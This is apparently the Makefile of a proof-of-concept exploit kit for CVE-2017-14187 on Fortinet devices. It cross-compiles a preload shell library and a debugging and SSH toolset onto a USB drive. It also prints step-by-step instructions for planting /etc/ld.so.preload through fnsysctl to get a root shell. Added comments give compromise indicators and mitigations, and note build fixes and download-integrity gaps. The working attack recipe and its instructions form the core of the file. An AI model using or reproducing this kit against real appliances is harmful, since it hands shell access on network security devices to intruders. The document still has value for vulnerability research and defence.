POC / Makefile
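# Environment prefixes that the recipes put in front of cross-build commands.
# _PATH appends the downloaded musl cross toolchain's bin/ directory to the
# caller's PATH. $(CURDIR) is maintained by make itself, so it stays correct
# under `make -C <dir>` where an inherited $(PWD) can be stale, and the quotes
# keep a PATH entry that contains spaces from splitting the shell command.
_PATH = PATH="$(PATH):$(CURDIR)/armv7l-linux-musleabihf-cross/bin"
# _LDFLAGS hands "-static -s -Os" to configure/make as LDFLAGS.
_LDFLAGS = LDFLAGS="-static -s -Os"

# Upstream versions fetched and built by the rules below.
# GDB_VER: changing this is not recommended. Per the original author, the
# latest GDB release caused dependency problems that were never resolved.
GDB_VER = 10.1
BASH_VER = 5.2.37
BINUTILS_VER = 2.45
FILE_VER = 5.46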

# Default goal (first rule in the file). Builds build/shell.so, and through it
# every tool listed as its prerequisite, then writes a one-line preload file and
# prints the author's installation guide.
# NOTE: the recipe writes build/ld.so.preload, not ./ld.so.preload, so unless a
# file of that name happens to exist here the target is never up to date and
# this recipe re-runs on every `make`.
# Defender note: the generated file names /usb/shell.so as a library to preload,
# and the guide below copies it into /etc on the appliance. An /etc/ld.so.preload
# that references removable media is a strong compromise indicator to alert on.
# Mitigation is the vendor's fix for CVE-2017-14187, together with restricting
# physical USB access and administrative credentials.
ld.so.preload: build/shell.so
	echo /usb/shell.so > build/ld.so.preload
	@echo
	@echo ------------------------------------------------------------------------------------------------------------------------
	@echo CVE-2017-14187 PoC for local debugging \& exploit development
	@echo by 0xSIGILL
	@echo
	@echo ALL DONE!
	@echo
	@echo INSTALLATION GUIDE
	@echo 1. Prepare a USB drive. The USB drive must have a MBR partition and FAT32 or FAT16 fs.
	@echo 2. Copy the contents of build directory to your USB drive.
	@echo 3. Insert it to your vulnerable FortiSomething.
	@echo 4. Open the console via admin webui.
	@echo 5. Get system_admin access. If you don\'t know what it is, see the official fortinet document \"config system admin\"
	@echo 6. Type \"fnsysctl cp /usb/ld.so.preload /etc\" and then enter your super_admin account creds.
	@echo 7. Type \"fnsysctl ls\" or command whatever you want.
	@echo    It will install some symlinks for Busybox shell. Try one more. Then you will get a shell.
	@echo 8. Enjoy\)\)
	@echo ------------------------------------------------------------------------------------------------------------------------

# Cross-compile shell.c into build/shell.so, the library that the generated
# ld.so.preload file refers to. The tool binaries are listed as prerequisites so
# that the rest of the build/ tree is produced before the library is linked;
# only shell.c ($<) is actually passed to the compiler.
build/shell.so: shell.c \
                build/bin/gdb \
                build/bin/dropbear \
                build/busybox-armv7l \
                build/bin/bash \
                build/bin/neofetch \
                build/bin/readelf \
                build/bin/file
	$(_PATH) $(_LDFLAGS) armv7l-linux-musleabihf-gcc -fPIC -shared -static -s $< -o $@

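# Cross-build Dropbear for armv7l/musl and copy its four binaries into build/bin.
# All prerequisites are order-only (after `|`): `dir` never produces a file named
# "dir", and the other two are directories, so as normal prerequisites they made
# this target look out of date and re-ran configure on every invocation.
# -j$$(nproc): the doubled `$` passes the command substitution to the shell. The
# original $(nproc) was an undefined make variable, which left a bare `-j`
# (unlimited parallel jobs).
build/bin/dropbear: | dir armv7l-linux-musleabihf-cross dropbear
	cd dropbear && $(_PATH) $(_LDFLAGS) ./configure --host=armv7l-linux-musleabihf --disable-zlib --disable-utmp --disable-wtmp && $(_PATH) $(_LDFLAGS) make -j$$(nproc)
	cp $(addprefix dropbear/,dbclient dropbear dropbearconvert dropbearkey) -t build/bin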

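# Cross-build GDB for armv7l/musl and copy gdbserver, gdb and gcore into build/bin.
# Prerequisites are order-only (after `|`): `dir` never produces a file named
# "dir" and the others are directories, so as normal prerequisites they forced a
# full reconfigure and rebuild on every invocation.
# -j$$(nproc): the doubled `$` passes the command substitution to the shell. The
# original $(nproc) was an undefined make variable, which left a bare `-j`
# (unlimited parallel jobs).
build/bin/gdb: | dir armv7l-linux-musleabihf-cross gdb-$(GDB_VER)
	cd gdb-$(GDB_VER) && $(_PATH) $(_LDFLAGS) ./configure --host=armv7l-linux-musleabihf --disable-source-highlight --disable-sim && $(_PATH) make -j$$(nproc)
	cp $(addprefix gdb-$(GDB_VER)/,gdbserver/gdbserver gdb/gdb gdb/gcore) -t build/bin
	# gcore is a shell script; point its interpreter line at the bash copied to the USB tree.
	sed -i '1s|.*|#!/usb/bin/bash|' build/bin/gcore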

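# Cross-build bash for armv7l/musl and copy the binary into build/bin.
# CC_FOR_BUILD selects the host compiler for bash's build-time helpers, and the
# CFLAGS entry downgrades implicit-function-declaration from an error.
# Prerequisites are order-only (after `|`): `dir` never produces a file named
# "dir" and the others are directories, so as normal prerequisites they forced a
# reconfigure and rebuild on every invocation.
# -j$$(nproc): the doubled `$` passes the command substitution to the shell. The
# original $(nproc) was an undefined make variable, which left a bare `-j`.
build/bin/bash: | dir armv7l-linux-musleabihf-cross bash-$(BASH_VER)
	cd bash-$(BASH_VER) && CC_FOR_BUILD="gcc -std=gnu99" $(_PATH) $(_LDFLAGS) CFLAGS="-Wno-error=implicit-function-declaration" ./configure --host=armv7l-linux-musleabihf --without-bash-malloc && $(_PATH) $(_LDFLAGS) make -j$$(nproc)
	cp bash-$(BASH_VER)/bash $@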

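# Cross-build binutils for armv7l/musl and copy a set of its tools into build/bin.
# readelf stands in as the target name for the whole set.
# Prerequisites are order-only (after `|`): `dir` never produces a file named
# "dir" and the others are directories, so as normal prerequisites they forced a
# reconfigure and rebuild on every invocation.
# -j$$(nproc): the doubled `$` passes the command substitution to the shell. The
# original $(nproc) was an undefined make variable, which left a bare `-j`.
build/bin/readelf: | dir armv7l-linux-musleabihf-cross binutils-$(BINUTILS_VER)
	cd binutils-$(BINUTILS_VER) && $(_PATH) LDFLAGS="--static -static -s -Os" ./configure --host=armv7l-linux-musleabihf --disable-shared --enable-static && $(_PATH) make -j$$(nproc)
	cp $(addprefix binutils-$(BINUTILS_VER)/binutils/,addr2line ar cxxfilt elfedit objcopy objdump ranlib readelf size) -t build/bin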

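# Cross-build file(1) for armv7l/musl and copy the binary plus its compiled
# magic database (magic.mgc) into build/bin.
# Prerequisites are order-only (after `|`): `dir` never produces a file named
# "dir" and the others are directories, so as normal prerequisites they forced a
# reconfigure and rebuild on every invocation.
# -j$$(nproc): the doubled `$` passes the command substitution to the shell. The
# original $(nproc) was an undefined make variable, which left a bare `-j`.
build/bin/file: | dir armv7l-linux-musleabihf-cross file-$(FILE_VER)
	cd file-$(FILE_VER) && $(_PATH) LDFLAGS="--static -static -s -Os" ./configure --host=armv7l-linux-musleabihf --disable-shared --enable-static && $(_PATH) make -j$$(nproc)
	cp $(addprefix file-$(FILE_VER)/,src/file magic/magic.mgc) -t build/bin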

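# Optional integrity pin for the prebuilt BusyBox binary, e.g.
#   make BUSYBOX_SHA256=<sha256-of-known-good-binary>
BUSYBOX_SHA256 ?=

# Download the prebuilt BusyBox 1.21.1 armv7l binary into build/.
# The rule has no prerequisite on the output directory, so create it here.
# The file is downloaded under a temporary name and renamed only on success,
# so an interrupted transfer cannot leave a truncated file that looks up to date.
# NOTE(review): this is a third-party binary used as-is; set BUSYBOX_SHA256 so
# the build fails when the download does not match a digest you trust.
build/busybox-armv7l:
	mkdir -p $(@D)
	wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv7l -O $@.tmp
	$(if $(strip $(BUSYBOX_SHA256)),echo "$(strip $(BUSYBOX_SHA256))  $@.tmp" | sha256sum -c -,@echo "warning: BUSYBOX_SHA256 not set; $@ is not integrity-checked")
	mv -f $@.tmp $@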

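# Optional integrity pin for the downloaded neofetch script, e.g.
#   make NEOFETCH_SHA256=<sha256-of-reviewed-script>
NEOFETCH_SHA256 ?=

# Download the neofetch shell script and rewrite its interpreter line to the
# bash copied into the USB tree.
# The rule has no prerequisite on the output directory, so create it here.
# The file is prepared under a temporary name and renamed only on success.
# NOTE(review): the URL tracks a branch head (refs/heads/master), so the script
# content can change between builds. Pin it to a commit (<commit-sha>) and/or
# set NEOFETCH_SHA256 so an unexpected change fails the build.
build/bin/neofetch:
	mkdir -p $(@D)
	wget https://raw.githubusercontent.com/dylanaraps/neofetch/refs/heads/master/neofetch -O $@.tmp
	$(if $(strip $(NEOFETCH_SHA256)),echo "$(strip $(NEOFETCH_SHA256))  $@.tmp" | sha256sum -c -,@echo "warning: NEOFETCH_SHA256 not set; $@ is not integrity-checked")
	sed -i '1s|.*|#!/usb/bin/bash|' $@.tmp
	mv -f $@.tmp $@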

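# Optional integrity pin for the prebuilt toolchain archive, e.g.
#   make TOOLCHAIN_SHA256=<sha256-of-known-good-archive>
TOOLCHAIN_SHA256 ?=

# Download and unpack the prebuilt musl cross toolchain.
# -O makes a re-run overwrite a partial archive. Without it, wget saves the new
# copy as "<name>.1" and tar keeps extracting the stale or truncated file.
# NOTE(review): these compiler binaries execute on the build host; set
# TOOLCHAIN_SHA256 so the archive is checked before anything is unpacked.
armv7l-linux-musleabihf-cross:
	wget -O $@.tgz https://musl.cc/armv7l-linux-musleabihf-cross.tgz
	$(if $(strip $(TOOLCHAIN_SHA256)),echo "$(strip $(TOOLCHAIN_SHA256))  $@.tgz" | sha256sum -c -,@echo "warning: TOOLCHAIN_SHA256 not set; $@.tgz is not integrity-checked")
	tar -xvf $@.tgz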

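# Fetch and unpack the GDB source tree for the pinned GDB_VER.
# -O makes a re-run overwrite a partial archive. Without it, wget saves the new
# copy as "<name>.1" and tar keeps extracting the stale or truncated file.
# NOTE(review): the archive is unpacked without any checksum or signature check;
# verify it against the publisher's detached signature before building.
gdb-$(GDB_VER):
	wget -O $@.tar.xz https://ftp.gnu.org/gnu/gdb/gdb-$(GDB_VER).tar.xz
	tar -xvf $@.tar.xz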

# Clone the Dropbear sources at the DROPBEAR_2025.88 tag into ./dropbear.
# NOTE(review): a tag name can be moved upstream; recording the resolved commit
# (<commit-sha>) would make the checkout reproducible and auditable.
dropbear:
	git clone --branch DROPBEAR_2025.88 https://github.com/mkj/dropbear.git $@

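# Fetch and unpack the binutils source tree for the pinned BINUTILS_VER.
# -O makes a re-run overwrite a partial archive. Without it, wget saves the new
# copy as "<name>.1" and tar keeps extracting the stale or truncated file.
# NOTE(review): the archive is unpacked without any checksum or signature check;
# verify it against the publisher's detached signature before building.
binutils-$(BINUTILS_VER):
	wget -O $@.tar.xz https://ftp.gnu.org/gnu/binutils/binutils-$(BINUTILS_VER).tar.xz
	tar -xvf $@.tar.xz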

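# Fetch and unpack the bash source tree for the pinned BASH_VER.
# -O makes a re-run overwrite a partial archive. Without it, wget saves the new
# copy as "<name>.1" and tar keeps extracting the stale or truncated file.
# NOTE(review): the archive is unpacked without any checksum or signature check;
# verify it against the publisher's detached signature before building.
bash-$(BASH_VER):
	wget -O $@.tar.gz https://ftp.gnu.org/gnu/bash/bash-$(BASH_VER).tar.gz
	tar -xvf $@.tar.gz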

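# Fetch and unpack the file(1) source tree for the pinned FILE_VER.
# -O makes a re-run overwrite a partial archive. Without it, wget saves the new
# copy as "<name>.1" and tar keeps extracting the stale or truncated file.
# NOTE(review): the archive is unpacked without any checksum or signature check;
# verify it against a digest or signature from the publisher before building.
file-$(FILE_VER):
	wget -O $@.tar.gz https://astron.com/pub/file/file-$(FILE_VER).tar.gz
	tar -xvf $@.tar.gz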

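# Create the output tree (build/bin and build/home).
# Declared phony because the recipe never creates a file named "dir"; without
# the declaration, a stray file or directory called "dir" would make this rule
# look up to date and the output directories would never be created.
.PHONY: dir
dir:
	mkdir -p build/bin build/home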

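# Remove everything the other rules download or build.
# Declared phony so a file named "clean" cannot disable it.
# The binutils and file(1) trees and archives are now removed too; the original
# left them behind. "bash-*" replaces the original "bash*" so that unrelated
# files whose names merely start with "bash" are not deleted.
.PHONY: clean
clean:
	$(RM) -r gdb-$(GDB_VER)* binutils-$(BINUTILS_VER)* file-$(FILE_VER)* bash-* dropbear armv7l-linux-musleabihf-cross* *.o build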